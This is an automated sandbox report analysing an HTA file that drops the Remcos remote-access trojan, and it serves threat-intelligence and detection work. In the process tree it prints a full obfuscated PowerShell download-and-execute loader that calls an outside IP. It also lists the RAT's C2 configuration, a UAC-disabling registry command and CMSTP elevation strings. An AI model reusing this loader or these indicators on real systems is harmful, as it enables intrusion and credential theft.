Edit tour

Windows Analysis Report
earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta

Overview

General Information

Sample name:	earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta
Analysis ID:	1639290
MD5:	54b1c0ca731cb53dc1778a393aa0ab38
SHA1:	c991cf04f9ded6b6823fdf5e730890850ea7b777
SHA256:	1062633c85423f873214e50175d44e3aa1a29f24e2abed589170ae69cf6f1138
Tags:	htauser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Yara detected VBS Downloader Generic

C2 URLs / IPs found in malware configuration

Command shell drops VBS files

Connects to a pastebin service (likely for C&C)

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Legitimate Application Dropped Script

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6972 cmdline: mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 6596 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 6672 cmdline: wscript //nologo "C:\Windows\Temp\nonordinary.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 3824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CasPol.exe (PID: 8328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

recover.exe (PID: 8416 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 8424 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 8432 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx" MD5: D38B657A068016768CA9F3B5E100B472)

recover.exe (PID: 8452 cmdline: C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy" MD5: D38B657A068016768CA9F3B5E100B472)

timeout.exe (PID: 6680 cmdline: timeout /t 1 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["qwertyuioplkjhgfdsazxcvbnm.ydns.eu:14645:1"], "Assigned name": "zyno666", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4E8SNN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\nonordinary.vbs	JoeSecurity_VBS_Downloader_Generic	Yara detected VBS Downloader Generic	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10efa8:$a1: Remcos restarted by watchdog! 0x10f5f8:$a3: %02i:%02i:%02i:%03i
0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x138210:$a1: Remcos restarted by watchdog! 0x138860:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 3824	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3824	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 3824	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 3824	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 3824	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x2533f7:$a1: Remcos restarted by watchdog! 0x2f82c7:$a1: Remcos restarted by watchdog! 0x253a4c:$a3: %02i:%02i:%02i:%03i 0x253e89:$a3: %02i:%02i:%02i:%03i 0x2f891c:$a3: %02i:%02i:%02i:%03i 0x2f8d59:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 3824	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x5738a:$b2: ::FromBase64String( 0x57e5d:$b2: ::FromBase64String( 0x58b46:$b2: ::FromBase64String( 0x77311:$b2: ::FromBase64String( 0x77577:$b2: ::FromBase64String( 0x923d1:$b2: ::FromBase64String( 0xc473e:$b2: ::FromBase64String( 0xc51c2:$b2: ::FromBase64String( 0x317416:$b2: ::FromBase64String( 0x317f7a:$b2: ::FromBase64String( 0x318a4d:$b2: ::FromBase64String( 0x838cee:$b2: ::FromBase64String( 0x85300b:$b2: ::FromBase64String( 0x853ada:$b2: ::FromBase64String( 0x91bcf0:$b2: ::FromBase64String( 0x91c7c0:$b2: ::FromBase64String( 0x970135:$b2: ::FromBase64String( 0x97147f:$b2: ::FromBase64String( 0x971f56:$b2: ::FromBase64String( 0x976034:$b2: ::FromBase64String( 0x97a2c7:$b2: ::FromBase64String(
Process Memory Space: CasPol.exe PID: 8328	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: CasPol.exe PID: 8328	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: CasPol.exe PID: 8328	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: CasPol.exe PID: 8328	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: CasPol.exe PID: 8328	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x13394:$a1: Remcos restarted by watchdog! 0x139e9:$a3: %02i:%02i:%02i:%03i 0x13e26:$a3: %02i:%02i:%02i:%03i
Process Memory Space: recover.exe PID: 8424	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.CasPol.exe.37e0000.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
14.2.recover.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
10.2.powershell.exe.5acb250.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.powershell.exe.5acb250.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.powershell.exe.5acb250.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.powershell.exe.5acb250.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6a358:$a1: Remcos restarted by watchdog! 0x6a9a8:$a3: %02i:%02i:%02i:%03i
10.2.powershell.exe.5acb250.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x645f4:$str_a1: C:\Windows\System32\cmd.exe 0x64570:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64570:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x650d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64664:$str_b2: Executing file: 0x6549c:$str_b3: GetDirectListeningPort 0x64ec8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65048:$str_b7: \update.vbs 0x6468c:$str_b9: Downloaded file: 0x64678:$str_b10: Downloading file: 0x6471c:$str_b12: Failed to upload file: 0x65464:$str_b13: StartForward 0x65484:$str_b14: StopForward 0x64fa0:$str_b15: fso.DeleteFile " 0x64f34:$str_b16: On Error Resume Next 0x64fd0:$str_b17: fso.DeleteFolder " 0x6470c:$str_b18: Uploaded file: 0x646cc:$str_b19: Unable to delete: 0x64f68:$str_b20: while fso.FileExists(" 0x64ba9:$str_c0: [Firefox StoredLogins not found]
10.2.powershell.exe.5acb250.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x644e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64478:$s1: CoGetObject 0x6448c:$s1: CoGetObject 0x644a8:$s1: CoGetObject 0x6e256:$s1: CoGetObject 0x64438:$s2: Elevation:Administrator!new:
12.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.CasPol.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6d758:$a1: Remcos restarted by watchdog! 0x6dda8:$a3: %02i:%02i:%02i:%03i
12.2.CasPol.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x679f4:$str_a1: C:\Windows\System32\cmd.exe 0x67970:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67970:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x67e70:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x684d8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x67a64:$str_b2: Executing file: 0x6889c:$str_b3: GetDirectListeningPort 0x682c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x68448:$str_b7: \update.vbs 0x67a8c:$str_b9: Downloaded file: 0x67a78:$str_b10: Downloading file: 0x67b1c:$str_b12: Failed to upload file: 0x68864:$str_b13: StartForward 0x68884:$str_b14: StopForward 0x683a0:$str_b15: fso.DeleteFile " 0x68334:$str_b16: On Error Resume Next 0x683d0:$str_b17: fso.DeleteFolder " 0x67b0c:$str_b18: Uploaded file: 0x67acc:$str_b19: Unable to delete: 0x68368:$str_b20: while fso.FileExists(" 0x67fa9:$str_c0: [Firefox StoredLogins not found]
12.2.CasPol.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x678e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x67878:$s1: CoGetObject 0x6788c:$s1: CoGetObject 0x678a8:$s1: CoGetObject 0x71656:$s1: CoGetObject 0x67838:$s2: Elevation:Administrator!new:
12.2.CasPol.exe.37e0000.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
14.2.recover.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
12.2.CasPol.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
12.2.CasPol.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.CasPol.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.CasPol.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
12.2.CasPol.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65ff4:$str_a1: C:\Windows\System32\cmd.exe 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66064:$str_b2: Executing file: 0x66e9c:$str_b3: GetDirectListeningPort 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66a48:$str_b7: \update.vbs 0x6608c:$str_b9: Downloaded file: 0x66078:$str_b10: Downloading file: 0x6611c:$str_b12: Failed to upload file: 0x66e64:$str_b13: StartForward 0x66e84:$str_b14: StopForward 0x669a0:$str_b15: fso.DeleteFile " 0x66934:$str_b16: On Error Resume Next 0x669d0:$str_b17: fso.DeleteFolder " 0x6610c:$str_b18: Uploaded file: 0x660cc:$str_b19: Unable to delete: 0x66968:$str_b20: while fso.FileExists(" 0x665a9:$str_c0: [Firefox StoredLogins not found]
12.2.CasPol.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65e78:$s1: CoGetObject 0x65e8c:$s1: CoGetObject 0x65ea8:$s1: CoGetObject 0x6fc56:$s1: CoGetObject 0x65e38:$s2: Elevation:Administrator!new:
10.2.powershell.exe.5acb250.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.powershell.exe.5acb250.7.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.powershell.exe.5acb250.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.powershell.exe.5acb250.7.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6bd58:$a1: Remcos restarted by watchdog! 0x6c3a8:$a3: %02i:%02i:%02i:%03i
